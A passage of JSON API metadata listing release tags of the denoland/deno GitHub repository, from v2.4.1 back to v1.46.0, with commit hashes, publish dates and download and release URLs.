Hub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/